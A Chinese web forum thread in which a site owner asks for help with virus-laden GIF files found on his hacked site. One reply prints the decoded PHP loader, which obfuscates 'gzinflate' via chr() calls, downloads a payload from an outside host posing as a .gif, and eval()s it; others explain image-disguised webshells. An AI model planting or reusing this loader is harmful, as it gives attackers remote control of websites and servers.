【已解决】网站中毒，找到几个GIF病毒和一个exe文件，求分析

Y-one · 发表于 2019-12-3 13:34

本帖最后由 Y-one 于 2019-12-4 15:07 编辑

站点找到几个病毒，之前的网站一直被百度判定为黑帽手段，导致站点排名下降厉害

今天找到几个病毒求分析，看看这几个病毒是干啥的，在我网站做了啥

还有就是病毒是不是和这个域名有关系163去掉jiang点com感谢各位大佬

第一次求助谢谢！！！

https://pan.baidu.com/s/1Sdr5M-l700DI5j1EOdppUg 提取 x8zr

featmellwo · 发表于 2019-12-3 13:56

[PHP] 纯文本查看 复制代码

<?php
set_time_limit(666);
$i = array("cms","chr","http://","www.phpsec.cc/Hack","/bypasswaf.gif");
s($i[1],$i[2].$i[3].$i[4]);
session_start();
function s($c,$url){
if(empty($_SESSION['PhpCode'])){
	$_SESSION['PhpCode']=file_get_contents($url);
	m($_SESSION['PhpCode'],$c);
	}		
}
function m($a,$c){
	$unzip=$c(103).$c(122).$c(105).$c(110);
	$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
	$ss = "";
	l($unzip($a),$ss);
}
function l($xx,$ss){
	$password = "admin";
	$MyName   = "Admin";
	@eval($xx.$ss);
}
?>

caniy · 发表于 2019-12-3 15:48

Y-one 发表于 2019-12-3 15:36
大马的危害是什么呢？小哥哥，劳烦多说一点涨涨知识

就是webshell,有这个就可以提权,控制你的网站,写入恶意代码,你检查下你网页代码,首页什么的,看看有没有多余的代码,可以提权控制你的服务器,植入其他木马,挖矿,刷流量,加广告什么的

苏浩 · 发表于 2019-12-3 13:46

右键以文本打开就可以看到了

zhan · 发表于 2019-12-3 13:51

这么隐蔽你是咋发现的

风度男子 · 发表于 2019-12-3 14:02

怎么发现的这么厉害

Y-one · 发表于 2019-12-3 14:22

苏浩发表于 2019-12-3 13:46
右键以文本打开就可以看到了

加密了，看不了，不知道怎么解开

Y-one · 发表于 2019-12-3 14:23

featmellwo 发表于 2019-12-3 13:56

老哥麻烦多说一些，看不懂，这个是揭开之后的？

runfucy · 发表于 2019-12-3 14:35

厉害了，这都被你发现了

caniy · 发表于 2019-12-3 15:24

59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代码.......就是可能在你网页源码里面插入恶意的链接刷流量

Y-one · 发表于 2019-12-3 15:36

caniy 发表于 2019-12-3 15:24
59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代 ...

大马的危害是什么呢？小哥哥，劳烦多说一点涨涨知识

帐号		自动登录	找回密码
密码			注册[Register]